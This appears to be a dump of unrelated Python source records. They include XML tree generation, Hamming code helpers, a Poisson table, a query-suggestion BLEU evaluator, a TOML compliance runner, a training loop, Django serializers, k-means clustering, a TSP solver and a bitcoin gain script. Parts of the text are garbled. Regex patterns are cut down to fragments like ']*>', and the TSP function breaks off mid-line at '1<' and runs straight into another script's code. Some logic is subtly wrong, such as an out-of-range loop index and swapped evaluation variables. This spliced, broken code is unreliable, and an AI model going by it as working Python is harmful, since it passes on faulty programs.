current_plp_text_maintain = re.sub(r'\"maintain_termination_success_\"', '\"maintain_termination_success_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_failure_\"', '\"maintain_termination_failure_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n\n text_for_configuration_variables += ('\\n'\n '\\n'\n '\\n').format(plp_maintain_index=plp_maintain_index)\n\n file_plp_maintain.write(current_plp_text_maintain)\n file_plp_maintain.close()\n\n path_plp_achieve_true = os.path.join(plps_path, \"achieve_true_{plp_achieve_true_index:08d}.xml\".format(\n plp_achieve_true_index=plp_achieve_true_index))\n file_plp_achieve_true = open(path_plp_achieve_true, 'wt')\n current_plp_text_achieve_true = plp_text_achieve_true\n current_plp_text_achieve_true = re.sub(r'\"achieve_true_\"',\n '\"achieve_true_{plp_achieve_true_index:08d}\"'.format(\n plp_achieve_true_index=plp_achieve_true_index),\n current_plp_text_achieve_true)\n\n current_plp_text_achieve_true = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_true)\n\n\n file_plp_achieve_true.write(current_plp_text_achieve_true)\n file_plp_achieve_true.close()\n\n\n path_plp_achieve_false = os.path.join(plps_path, \"achieve_false_{plp_achieve_false_index:08d}.xml\".format(\n plp_achieve_false_index=plp_achieve_false_index))\n file_plp_achieve_false = open(path_plp_achieve_false, 'wt')\n current_plp_text_achieve_false = plp_text_achieve_false\n current_plp_text_achieve_false = re.sub(r'\"achieve_false_\"',\n '\"achieve_false_{plp_achieve_false_index:08d}\"'.format(\n 
plp_achieve_false_index=plp_achieve_false_index),\n                                                current_plp_text_achieve_false)\n\n        current_plp_text_achieve_false = re.sub(r'\"maintain_\"',\n                                                '\"maintain_{plp_maintain_index:08d}\"'.format(\n                                                    plp_maintain_index=plp_maintain_index),\n                                                current_plp_text_achieve_false)\n\n        file_plp_achieve_false.write(current_plp_text_achieve_false)\n        file_plp_achieve_false.close()\n\n        nodes_counter += 9\n\n    configuration_input_text = file_configuration_input.read()\n    configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n    configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n\n\n    text_for_configuration_variables += ('\\n'\n                                         '\\n' )\n                                         # '\\n'\n                                         # '\\n'\n                                         # '\\n')\n\n    #text_for_configuration_parameters += ('\\n')\n\n    configuration_input_text = configuration_input_text.replace( \"\", text_for_configuration_variables + text_for_configuration_parameters + \"\" )\n\n    file_configuration_input.truncate(0) # .*\n    file_configuration_input.seek(0)\n    file_configuration_input.write(configuration_input_text)\n\n\n    control_graph_input_text = control_graph_input_text.replace( \"\", control_graph_text + \"\" )\n\n    file_control_graph_input.truncate(0) # .*\n    file_control_graph_input.seek(0)\n    file_control_graph_input.write(control_graph_input_text)\n\n\n    plp_file_achieve_false.close()\n    plp_file_achieve_true.close()\n    plp_file_maintain.close()\n    plp_file_observe.close()\n    file_configuration_input.close()\n    file_control_graph_input.close()\n    print(\"Done\")\n    \n    \nmain(True)\n\n# Run example:\n# ./create_tree.py control_graph.xml configurations.xml plps/ 10\n","sub_path":"Examples/example_comprehensive_test/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":17612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247561726","text":"v1 = [0,0,1,0,1,0,1]\nv2 = [1,1,0,0,1,0]\n\ndef Hamming_Distance():\n    hd = 0\n    if len(v1) != len(v2):\n        print('These vectors are not the same length.')\n    else:\n        for i in range(len(v1)):\n            if v1[i] != v2[i]:\n                hd+=1\n        \n        print('The Hamming Distance is',hd)\n    \n\ndef decimalToVector(i,l):\n    number = bin(i)[2:]\n    if l < len(number):\n        print('The number of chosen bits is too little for this number.')\n    else:\n        vector = []\n        if len(number) < l:\n            d = l - len(bin(i)[2:])\n            for i in range(d):\n                vector.append('0')\n        for i in range(len(vector)):\n            vector[i] = int(vector[i])\n        for i in range(len(number)):\n            vector.append(int(number[i]))\n        return(vector)\n\ndef vectorToDecimal(v):\n    lst_v = []\n    for items in v:\n        lst_v.append(str(items))\n    decimal = int((''.join(lst_v)),2)\n    print('The decimal of this vector is',decimal)\n\n\nv = [1,1,1,0]\nG = [[1,1,1,0,0,0,0],[1,0,0,1,1,0,0],[0,1,0,1,0,1,0],[1,1,0,1,0,0,1]]\n\ndef vectorTimesMatrix(v,G):\n    i = 0 \n    m = 0 \n    count = 0\n    times = 0\n    calc_vector = []\n    if len(v) != len(G):\n        print('Error: dimensions do not match')\n    else:\n        while i <= len(v):\n            times += G[i][m] * v[i]\n            i+=1\n            if i == len(v):\n                m+=1\n                i=0\n                count+=1\n                times %= 2  # the code is binary, so reduce the column sum modulo 2\n                calc_vector.append(times)\n                times = 0\n                if count == len(G[0]):\n                    break\n        print(calc_vector)\n\ndef MatrixGridPrint(G):\n    for vector in G:\n        row = []\n        for digit in vector:\n            row.append(str(digit))\n        print(''.join(row))\n    \n    \n#function HammingG\n#input: a number r\n#output: G, the generator matrix of the (2^r-1,2^r-r-1) Hamming code\ndef hammingGeneratorMatrix(r):\n    n = 2**r-1\n    
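# e.g. r = 3 gives n = 7, i.e. the classic (7,4) Hamming code, so G below comes out as a 4x7 matrix\n    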
\n #construct permutation pi\n pi = []\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n\n #construct rho = pi^(-1)\n rho = []\n for i in range(n):\n rho.append(pi.index(i+1))\n\n #construct H'\n global H\n H = []\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n\n #construct G'\n GG = [list(i) for i in zip(*H)]\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n\n #apply rho to get Gtranpose\n G = []\n for i in range(n):\n G.append(GG[rho[i]])\n\n #transpose \n G = [list(i) for i in zip(*G)]\n MatrixGridPrint(G)\n \n\nm = [1,0,0,0] \ndef HammingEncoder():\n vectorTimesMatrix(m,G)\n\ndef HammingTranspose():\n HTranspose =[list(i) for i in zip(*G)]\n MatrixGridPrint(HTranspose)\n\n\n\n \n \n \n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.1.py","file_name":"ErrorCorrectingV1.1.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"477094492","text":"#10-14-21 KYGM\n#App that returns poisson probability distribution table\n#complete\n\nimport math\n\ncont = 1\n \n# Returns factorial of n\ndef fact(n):\n \n res = 1\n \n for i in range(2, n+1):\n res = res * i\n \n return res\n\n#Returns PPD\ndef ppd(lbd,t,x):\n ppd = (((lbd*t)**x)/(fact(x)))*math.exp((-lbd)*t)\n return ppd\n\n#input constants\nlbd = input(\"Enter Lambda: \")\nt = input(\"Enter t: \")\nli = input(\"Enter list size: \")\n\n#casting\nlbd = float(lbd)\nt = int(t)\nli = int(li)\n\nwhile cont == 1:\n \n for i in range(li + 1):\n doge = ppd(lbd,t,i)\n print(i, \": \", doge)\n \n \n cont = input(\"Enter 1 for another or 0 to end: \")\n cont = int(cont)\n \n \n\n\n","sub_path":"PPDTable.py","file_name":"PPDTable.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"492637329","text":"###############################################################################\n# Author: Wasi Ahmad\n# Project: Neural Session Relevance Framework\n# Date Created: 7/29/2017\n#\n# File Description: This script evaluates test ranking performance.\n###############################################################################\n\nimport os, util, helper, data, multi_bleu, torch\nfrom torch.autograd import Variable\nfrom data import Session\nfrom model import NSRF\n\nargs = util.get_args()\n\n\ndef suggest_next_query(model, session_queries, session_query_length, dictionary):\n # query encoding\n embedded_queries = model.embedding(session_queries.view(-1, session_queries.size(-1)))\n encoded_queries = model.query_encoder(embedded_queries, session_query_length.view(-1).data.cpu().numpy())\n encoded_queries = model.apply_pooling(encoded_queries, model.config.pool_type)\n # encoded_queries: batch_size x session_length x (nhid_query * self.num_directions)\n encoded_queries = encoded_queries.view(*session_queries.size()[:-1], -1)\n\n # session level encoding\n sess_q_hidden = model.session_query_encoder.init_weights(encoded_queries.size(0))\n hidden_states, cell_states = [], []\n # loop over all the queries in a session\n for idx in range(encoded_queries.size(1)):\n # update session-level query encoder state using query representations\n sess_q_out, sess_q_hidden = model.session_query_encoder(encoded_queries[:, idx, :].unsqueeze(1), sess_q_hidden)\n # -1: only consider hidden states of the last layer\n if model.config.model == 'LSTM':\n 
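# an LSTM returns its state as an (h, c) tuple: index 0 is the hidden state, index 1 the cell state\n            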
hidden_states.append(sess_q_hidden[0][-1])\n cell_states.append(sess_q_hidden[1][-1])\n else:\n hidden_states.append(sess_q_hidden[0][-1])\n\n hidden_states = torch.stack(hidden_states, 1)\n hidden_states = hidden_states[:, -1, :].contiguous().view(-1, hidden_states.size(-1)).unsqueeze(0)\n if model.config.model == 'LSTM':\n cell_states = torch.stack(cell_states, 1)\n cell_states = cell_states[:, -1, :].contiguous().view(-1, cell_states.size(-1)).unsqueeze(0)\n decoder_hidden = (hidden_states, cell_states)\n else:\n decoder_hidden = hidden_states\n\n sos_token_index = dictionary.word2idx['']\n eos_token_index = dictionary.word2idx['']\n\n # First input of the decoder is the sentence start token\n decoder_input = Variable(torch.LongTensor([sos_token_index]))\n decoded_words = []\n for di in range(model.config.max_query_length + 1):\n if model.config.cuda:\n decoder_input = decoder_input.cuda()\n embedded_decoder_input = model.embedding(decoder_input).unsqueeze(1)\n decoder_output, decoder_hidden = model.decoder(embedded_decoder_input, decoder_hidden)\n topv, topi = decoder_output.data.topk(1)\n ni = topi[0][0]\n if ni == eos_token_index:\n break\n else:\n decoded_words.append(dictionary.idx2word[ni])\n decoder_input = Variable(torch.LongTensor([ni]))\n\n return \" \".join(decoded_words)\n\n\ndef evaluate(model, dictionary, session_queries):\n session = Session()\n session.queries = session_queries\n session_queries, session_query_length, rel_docs, rel_docs_length, doc_labels = helper.session_to_tensor(\n [session], dictionary, iseval=True)\n if model.config.cuda:\n session_queries = session_queries.cuda()\n session_query_length = session_query_length.cuda()\n return suggest_next_query(model, session_queries, session_query_length, dictionary)\n\n\nif __name__ == \"__main__\":\n dictionary = helper.load_object(args.save_path + 'dictionary.p')\n embeddings_index = helper.load_word_embeddings(args.word_vectors_directory, args.word_vectors_file,\n dictionary.word2idx)\n model = NSRF(dictionary, embeddings_index, args)\n if args.cuda:\n model = model.cuda()\n helper.load_model_states_from_checkpoint(model, os.path.join(args.save_path, 'model_best.pth.tar'), 'state_dict',\n args.cuda)\n print('model, embedding index and dictionary loaded.')\n model.eval()\n\n test_corpus = data.Corpus(args.tokenize, args.max_query_length, args.max_doc_length)\n test_corpus.parse(args.data + 'test.txt', args.max_example)\n print('test set size = ', len(test_corpus))\n\n targets, candidates = [], []\n fw = open(args.save_path + 'predictions_mmt.txt', 'w')\n for sess_len, sessions in test_corpus.data.items():\n for sess in sessions:\n for i in range(len(sess) - 1):\n target = evaluate(model, dictionary, sess.queries[:i + 1])\n candidate = \" \".join(sess.queries[i + 1].query_terms[1:-1])\n targets.append(target)\n candidates.append(candidate)\n inp = []\n for query in sess.queries[:i + 1]:\n inp.append(' '.join(query.query_terms[1:-1]))\n fw.write(', '.join(inp) + ' <:::> ' + candidate + ' <:::> ' + target + '\\n')\n fw.close()\n\n print(\"target size = \", len(targets))\n print(\"candidate size = \", len(candidates))\n multi_bleu.print_multi_bleu(targets, candidates)\n","sub_path":"multi_task_models/MNSRF/test_bleu.py","file_name":"test_bleu.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421608697","text":"import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a boy and his 
toys that come to life\",\n                        \"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\n                        \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n                     \"A paraplegic marine dispatched to the moon Pandora on a unique mission becomes torn between following his orders and protecting the world he feels is his home.\",\n                     \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\n                     \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\namericanPsycho = media.Movie(\"American Psycho\",\n                             \"Patrick Bateman, 27 years old, who believes in taking care of himself\",\n                             \"https://upload.wikimedia.org/wikipedia/en/6/63/Americanpsychoposter.jpg\",\n                             \"https://www.youtube.com/watch?v=RjKNbfA64EE\")\n\n'''\nTester Code:\nprint(toy_story.storyline)\navatar.show_trailer()\n'''\n\nmovies = [toy_story, avatar, americanPsycho]\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107339311","text":"#!/usr/bin/env python\n\"\"\"TOML compliance suite runner.\n\"\"\"\n\nimport argparse\nimport difflib\nimport json\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport textwrap\nfrom pathlib import Path\n\n\nclass Failed(Exception):\n    \"\"\"Raised when a check fails for some reason\n\n    :param reason:\n        Textual reason, explaining why the test failed.\n    :param cause:\n        Exception, representing the reason for failure.\n    :param diff:\n        A tuple of 2 JSON-able objects, that should be presented as a diff.\n    \"\"\"\n\n    def __init__(self, reason, *, cause=None, diff=None):\n        self.reason = reason\n\n        if cause is not None:\n            self.details = repr(cause)\n        elif diff is not None:\n            correct, got = diff\n            correct_str = json.dumps(correct, indent=2, sort_keys=True)\n            got_str = json.dumps(got, indent=2, sort_keys=True)\n\n            diff_lines = difflib.ndiff(\n                correct_str.splitlines(keepends=False),\n                got_str.splitlines(keepends=False),\n            )\n            self.details = \"\\n\".join(diff_lines)\n        else:\n            self.details = None\n\n        super().__init__(reason, self.details)\n\n\nclass JSONValidationError(Exception):\n    \"\"\"Raised when the JSON data does not have valid types or values for the type.\n    \"\"\"\n\n    def __repr__(self):\n        return str(self)\n\n\n# --------------------------------------------------------------------------------------\n# Colors\n# --------------------------------------------------------------------------------------\n_COLOR_ALLOWED = sys.stdout.isatty()\n# Handle optional Windows-ANSI support dependency (colorama)\nif _COLOR_ALLOWED and os.name == \"nt\":\n    try:\n        import colorama\n    except ImportError:\n        print(\n            \"TIP: If you install https://pypi.org/project/colorama, this program \"\n            \"will look much better.\"\n        )\n        _COLOR_ALLOWED = False\n    else:\n        colorama.init()\n\n_COLOR_NAMES = [\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\"]\n_COLOR_DICT = dict(zip(_COLOR_NAMES, range(8)))\n\n\ndef colored(s, *, fg=None, bg=None, bold=False):\n    assert fg is not None or bg is not None\n    if not _COLOR_ALLOWED:\n        return s\n\n    ansi_codes = []\n    if bold:\n        ansi_codes.append(1)\n    if fg is not None:\n        ansi_codes.append(_COLOR_DICT[fg] + 30)\n    if bg is not None:\n        ansi_codes.append(_COLOR_DICT[bg] + 40)\n\n    parameters = \";\".join(map(str, ansi_codes))\n\n    return f\"\\033[{parameters}m{s}\\033[0m\"\n\n\n
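# Example: colored(\" PASS \", fg=\"grey\", bg=\"green\", bold=True) returns\n# \"\\033[1;30;42m PASS \\033[0m\" on a TTY, and the string unchanged otherwise.\n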
# --------------------------------------------------------------------------------------\n# Filesystem interaction\n# --------------------------------------------------------------------------------------\nhere = Path(__file__).parent\n\n\ndef ensure_executable(path):\n    if not os.path.isfile(path):\n        raise FileNotFoundError(f\"Could not find file: {path}\")\n    if not os.access(path, os.X_OK):\n        raise PermissionError(f\"Not an executable file: {path}\")\n\n\ndef _locate_test_pairs():\n    for path in sorted((here / \"invalid\").glob(\"*/*.toml\")):\n        yield path, None\n    for path in sorted((here / \"invalid\").glob(\"*/*.json\")):\n        yield None, path\n\n    for path in sorted((here / \"valid\").glob(\"*/*.toml\")):\n        json_equivalent = path.with_suffix(\".json\")\n        assert json_equivalent.exists(), f\"Missing: {json_equivalent}\"\n        yield path, json_equivalent\n\n\ndef _filter_based_on_markers(pairs, markers):\n    def marker_filter(pair):\n        # No filtering if no markers given.\n        if not markers:\n            return True\n\n        # pair is (toml_file, json_file); either side may be None.\n        path = pair[0] if pair[0] is not None else pair[1]\n        for m in markers:\n            # Matches the name of the file (allows -m basic)\n            if m in path.stem:\n                return True\n            # Matches the name of the parent folder (allows -m array)\n            if m == path.parent.name:\n                return True\n            # Matches the name of the grandparent folder (allows -m invalid)\n            if m == path.parent.parent.name:\n                return True\n        return False\n\n    yield from filter(marker_filter, pairs)\n\n\ndef get_test_pairs(markers):\n    pairs = _locate_test_pairs()\n    yield from _filter_based_on_markers(pairs, markers)\n\n\n# --------------------------------------------------------------------------------------\n# Input / Output Handling\n# --------------------------------------------------------------------------------------\ndef run_program(program, *, stdin, clean_exit):\n    try:\n        process = subprocess.run(\n            [program], input=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n        )\n    except OSError as error:\n        raise Failed(f\"could not run: {program}\", cause=error)\n\n    # Valid test cases must exit cleanly; invalid ones must be rejected.\n    if clean_exit:\n        if process.returncode:\n            raise Failed(f\"Got a non-zero exit code: {process.returncode}\")\n        if process.stderr:\n            raise Failed(\"Got stderr output!\", cause=process.stderr)\n    else:\n        if not process.returncode:\n            raise Failed(\"Should have rejected input.\")\n\n    return process.stdout\n\n\ndef validate_json(obj):\n    # raise JSONValidationError(\"This is what the error looks like!\\nlol\")\n    pass\n\n\ndef load_json(*, content, source):\n    assert source in [\"decoder's output\", \"test case input\"]\n    try:\n        loaded = json.loads(content)\n    except json.JSONDecodeError as error:\n        raise Failed(f\"Could not parse {source} JSON\", cause=error)\n\n    try:\n        validate_json(loaded)\n    except JSONValidationError as error:\n        # Note that we're passing the error as the 'cause' here, since we want the\n        # string representation (which gets formatted correctly).\n        raise Failed(f\"Got incorrect JSON from {source}\", cause=error)\n\n    return loaded\n
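\n\n# Note: load_json returns the parsed object, e.g.\n# load_json(content='{\"a\": 1}', source=\"test case input\") == {\"a\": 1},\n# and raises Failed when the content is malformed or fails validation.\n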
\n\n# --------------------------------------------------------------------------------------\n# Actual Compliance Checks\n# --------------------------------------------------------------------------------------\ndef test_decoder(toml_file, json_file, clean_exit, decoder):\n    content = run_program(decoder, stdin=toml_file.read_bytes(), clean_exit=clean_exit)\n\n    # For invalid Test Cases there is no JSON equivalent; rejection was the whole test.\n    if json_file is None:\n        return\n\n    # For valid Test Cases\n    correct_json = load_json(content=json_file.read_text(), source=\"test case input\")\n    decoded_json = load_json(content=content, source=\"decoder's output\")\n\n    if correct_json != decoded_json:\n        raise Failed(\n            \"Mismatch between expected JSON and decoded JSON.\",\n            diff=(correct_json, decoded_json),\n        )\n\n\ndef test_encoder(json_file, clean_exit, encoder, decoder):\n    input_json = load_json(content=json_file.read_text(), source=\"test case input\")\n\n    # Encode the input.\n    result = run_program(encoder, stdin=json_file.read_bytes(), clean_exit=clean_exit)\n\n    # For invalid Test Cases the encoder must reject the input; nothing left to decode.\n    if not clean_exit:\n        return\n\n    # Decode the result.\n    decoded = run_program(decoder, stdin=result, clean_exit=True)\n\n    # Check round-trip was same as original\n    round_trip_json = load_json(content=decoded, source=\"decoder's output\")\n\n    if input_json != round_trip_json:\n        raise Failed(\n            \"Mismatch between original JSON and encoded-decoded JSON.\",\n            diff=(input_json, round_trip_json),\n        )\n\n\n# --------------------------------------------------------------------------------------\n# Check Runners!\n# --------------------------------------------------------------------------------------\ndef _show_summary(counts):\n    total = sum(counts.values())\n    if total == 0:\n        print(colored(\"Deselected all tests!\", fg=\"red\"))\n        return\n\n    n_passed = colored(\n        f\"{counts['pass']} passed\", fg=\"green\" if counts[\"pass\"] else \"red\"\n    )\n    n_total = f\"{total} total\"\n\n    print()\n    print(\"Summary: \", n_passed, \", \", n_total, sep=\"\")\n\n\ndef _show_pass(name):\n    print(colored(\" PASS \", fg=\"grey\", bg=\"green\"), end=\" \")\n    print(colored(name, fg=\"cyan\"))\n\n\ndef _show_fail(name, failed):\n    print(colored(\" FAIL \", fg=\"grey\", bg=\"red\"), end=\" \")\n    print(colored(name, fg=\"cyan\"))\n\n    reason = textwrap.indent(failed.reason, \"    \")\n    print(colored(reason, fg=\"red\"))\n    if failed.details:\n        print(textwrap.indent(str(failed.details), \"    \"))\n\n\n# The messy functions above keep this function clean.\ndef run_with_reporting(function, checks):\n    counts = {\"fail\": 0, \"pass\": 0}\n\n    for name, kwargs in checks:\n        try:\n            function(**kwargs)\n        except Failed as e:\n            _show_fail(name, e)\n            counts[\"fail\"] += 1\n        else:\n            _show_pass(name)\n            counts[\"pass\"] += 1\n\n    _show_summary(counts)\n\n    # This will be the program's exit code\n    if counts[\"fail\"] or sum(counts.values()) == 0:\n        return 1\n    return 0\n\n\ndef encoder_compliance(encoder, decoder, markers):\n    def generate_parameters():\n        for toml_file, json_file in get_test_pairs(markers):\n            if json_file is None:  # need something to encode!\n                continue\n            yield (\n                json_file,\n                {\n                    \"json_file\": json_file,\n                    \"clean_exit\": toml_file is not None,\n                    \"encoder\": encoder,\n                    \"decoder\": decoder,\n                },\n            )\n\n    ensure_executable(encoder)\n    ensure_executable(decoder)\n\n    return run_with_reporting(test_encoder, generate_parameters())\n\n\ndef decoder_compliance(decoder, markers):\n    def generate_parameters():\n        for toml_file, json_file in get_test_pairs(markers):\n            if toml_file is None:  # need something to decode!\n                continue\n            yield (\n                toml_file,\n                {\n                    \"toml_file\": toml_file,\n                    \"clean_exit\": json_file is not None,\n                    \"json_file\": json_file,\n                    \"decoder\": decoder,\n                },\n            )\n\n    ensure_executable(decoder)\n    return run_with_reporting(test_decoder, generate_parameters())\n\n\n# --------------------------------------------------------------------------------------\n# CLI argument handling\n# --------------------------------------------------------------------------------------\ndef get_parser():\n    parser = argparse.ArgumentParser(prog=\"toml-compliance/run.py\", allow_abbrev=False)\n    subparsers = parser.add_subparsers(title=\"commands\")\n\n    encoder = subparsers.add_parser(\"encoder\")\n    
encoder.add_argument(\"target\", action=\"store\", help=\"Encoder to test\")\n    encoder.add_argument(\n        \"--decoder\",\n        action=\"store\",\n        help=\"Supporting decoder for testing\",\n        required=True,\n    )\n    encoder.add_argument(\n        \"-m\",\n        metavar=\"MARKER\",\n        dest=\"markers\",\n        help=\"Only run tests that match given marker. Can be specified multiple times.\",\n        action=\"append\",\n    )\n\n    decoder = subparsers.add_parser(\"decoder\")\n    decoder.add_argument(\"target\", action=\"store\", help=\"Decoder to test\")\n    decoder.add_argument(\n        \"-m\",\n        metavar=\"MARKER\",\n        dest=\"markers\",\n        help=\"Only run tests that match given marker. Can be specified multiple times.\",\n        action=\"append\",\n    )\n\n    return parser\n\n\nif __name__ == \"__main__\":\n    parser = get_parser()\n    args = parser.parse_args()\n\n    if \"target\" not in args:\n        parser.print_help()\n        sys.exit(1)\n\n    # This check isn't super clear at first glance. It works since the 'decoder'\n    # subparser does not have a 'decoder' argument.\n    should_run_encoder_tests = \"decoder\" in args\n\n    if should_run_encoder_tests:\n        exit_code = encoder_compliance(args.target, args.decoder, args.markers)\n    else:\n        exit_code = decoder_compliance(args.target, args.markers)\n\n    sys.exit(exit_code)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436177286","text":"from sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#setup values\ndata = pd.read_csv('nci1.csv')\nnumber_of_rows = len(data.index)\nnumber_of_clusters = 5\ncolor_map = []\ncolor_set = ['red','blue','yellow','green','orange','purple']\n\n#Cluster Algorithm\nkmeans = KMeans(n_clusters=number_of_clusters, random_state=0).fit(data.drop(['type'], axis= 1))\nk_cluster = kmeans.labels_\n\n\n\n#set up color map based on cluster\nfor row in range(0,number_of_rows):\n    color_map.append(color_set[k_cluster[row]])\n\n\n#Visualization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data.drop(['type'], axis= 1)))\n\n#Visualization (t-SNE Algorithm)\ntsne_2d = TSNE(n_components=2, perplexity=3)\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data.drop(['type'], axis= 1)))\n\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\nplt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n#bx = plt.axes(projection =\"3d\")\n#bx.scatter3D(TCs_3d.loc[:,0],TCs_3d.loc[:,1], TCs_3d.loc[:,2], color = color_map)\n#plt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\n\n\nplt.title('PCA Dimension-Representation of Kmeans Clustering')\nplt.show()","sub_path":"Past Files/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107790201","text":"import sys;sys.stdin=open('input2.txt','r')\n\n\ndef tsp(now, next): # now = the current customer, next = bitmask of customers visited so far\n    ret = dp[now][next]\n    res = float('INF')\n    if next == all: # if every customer has been handled\n        return dist[now][N+1] # return the distance from that customer back home\n    if ret != 0: # already computed, so reuse the memoized value\n        return ret\n    for i in range(1, N+1): # from customer 1 to customer N. 
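(each set bit of next marks a customer already on the route)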
\n        if next&(1<', max=nIters)\n\n\n    #print(\"aaaaaaaaaaaaaaaaa\")\n\n    for i, (input, target3D, meta) in enumerate(dataLoader):\n        #print(input.size())\n        input_var = torch.autograd.Variable(input).float().cuda()\n#        target3D_var = torch.autograd.Variable(target3D).float().cuda()\n        target3D_var = torch.autograd.Variable(meta).float().cuda()\n\n\n        # print(target3D_var)\n\n        output = model(input_var)\n#        reg = output[opt.nStack]\n\n        optimizer.zero_grad()\n        loss = mean_squared_error(output, target3D_var)\n        loss.backward()\n        optimizer.step()\n\n        #print(i)\n\n\n\n        Loss.update(loss, input.size(0))\n        #Acc.update(Accuracy((output.data).cpu().numpy(), (target3D_var.data).cpu().numpy()))\n\n        #Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {loss.avg:.6f} | Loss3D {loss3d.avg:.6f} | Acc {Acc.avg:.6f} | Mpjpe {Mpjpe.avg:.6f} ({Mpjpe.val:.6f})'.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, loss=Loss, Acc=Acc, split = split, Mpjpe=Mpjpe, loss3d = Loss3D)\n        Bar.suffix = '{split} Epoch: [{0}][{1}/{2}]| Total: {total:} | ETA: {eta:} | Loss {lossa:} '.format(epoch, i, nIters, total=bar.elapsed_td, eta=bar.eta_td, lossa = Loss.avg, split=split)\n        #print(Loss.avg)\n        bar.next()\n    bar.finish()\n\n    if i%500 == 0:\n        _checkpoint( model, optimizer)\n\n    return Loss.avg #, Acc.avg, Mpjpe.avg, Loss3D.avg\n\n\ndef train(epoch, opt, train_loader, model, criterion, optimizer):\n    return step('train', epoch, opt, train_loader, model, criterion, optimizer)\n\ndef val(epoch, opt, val_loader, model, criterion):\n    return step('val', epoch, opt, val_loader, model, criterion)\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385945120","text":"from rest_framework import serializers\nfrom .models import *\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = User\n        fields = ('username','password')\n\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n    user = UserSerializer()\n\n    class Meta:\n        model = Userprofile\n        fields = ('user','tel','type','nickname','headportrait')\n\n    def to_representation(self, instance):\n        ret = super(UserprofileSerializer,self).to_representation(instance)\n        ret.pop('user')\n        ret['username'] = instance.user.username\n        return ret\n\n    def create(self,validated_data):\n        user = validated_data.pop('user')\n        user = User.objects.create_user(**user)\n        userprofile = Userprofile.objects.create(user=user,**validated_data)\n        return userprofile\n\n    def update(self, instance, validated_data):\n        # update the nested user first, then the profile itself; note that\n        # __dict__.update returns None, so the instance must be returned explicitly\n        user_data = validated_data.pop('user', None)\n        if user_data:\n            instance.user.__dict__.update(**user_data)\n            instance.user.save()\n        instance.__dict__.update(**validated_data)\n        instance.save()\n        return instance\n","sub_path":"backend/fangdiaocenter/fangdiaocenter/user/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520393217","text":"# program to calculate the gain or loss on bitcoin transactions\r\n# one line of text as header followed by columns of data\r\n# Data file date, +/-coin number, cost$\r\n# 20190402,0.050,205\r\n\r\nimport csv\r\nimport sys\r\nimport os\r\nfrom datetime import date\r\nfrom decimal import *\r\n\r\n\r\ndatafile = \"test.txt\"\r\nwritefile = \"test.csv\"\r\n\r\nPrecision = 8 # number of decimal places in the data\r\n\r\n\r\n\r\ndef SortData():\r\n# separate data into 2 strings\r\n# 
